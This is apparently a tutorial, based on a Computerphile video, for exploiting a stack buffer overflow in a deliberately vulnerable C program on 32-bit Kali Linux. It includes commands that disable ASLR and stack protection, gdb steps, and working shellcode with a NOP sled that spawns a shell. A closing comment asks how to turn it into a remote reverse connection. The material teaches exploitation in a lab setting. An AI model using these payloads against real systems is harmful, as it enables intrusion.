This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
http://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/ http://www.akadia.com/services/ora_enable_core.html
cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c
# verify "unlimited"
http://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it
[envexec.sh]
#!/bin/sh
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
else
exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
fi
else
exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi
[vuln.c]
#include <stdio.h>
#include <string.h>
int main (int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
# compile the code
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln
# clean the environment, debug
chmod +x envexec.sh
./envexec.sh -d vuln
# clean the environment, execute exploit
./envexec.sh /root/vuln $(python ...)
# run gdb, load a program to analyze
gdb vuln
# quit the debugger
quit
# clear the screen
ctrl + l
shell clear
# show debugging symbols, ie. code
list
list main
# show the assemlby code
disas main
# examine information
info os
info functions
info variables
# run the program, with input
run Hello
# run the overflow, seg fault
run $(python -c 'print "\x41" * 508')
# examine memory address
x/200x ($esp - 550)
# confirm overwrite of ebp register
info registers
# find a location, below ESP (stack pointer)
EDI = destination index, string / array copying
ESI = source index, string + array copying
EIP = index pointer, next address to execute
EBP = stack base pointer
ESP = stack pointer, starting in high memory, going down
EDX = data register
# run the overflow, launch a zsh shell
run $(python -c 'print "\x90" * 426 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')
# examine memory address
x/200x ($esp - 550)
# convert memeory address to little endian
ecx 0xbfffffc0 -1073741888
edx 0xbffffc3a -1073742790
ebx 0xb7fb8000 -1208254464
esp 0xbffffc40 0xbffffc40
ebp 0x51515151 0x51515151
0xbf ff fa ba
\xba\xfa\xff\xbf
# run the exploit, execut /bin/zsh5
run $(python -c 'print "\x90" * 425 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xba\xfa\xff\xbf" * 10')
i have some q above Buffer overflow
1- is this exploit just work in kali unstable kernal or all destribution of linux (32bit arch)?
2- why we used envexec.sh we can use internal GDB ?
3- how we can redirect this to work remotly in reverse conntion?
i have kali 4.0.0 (Debian 4.0.1) 32bit but not work with me why ?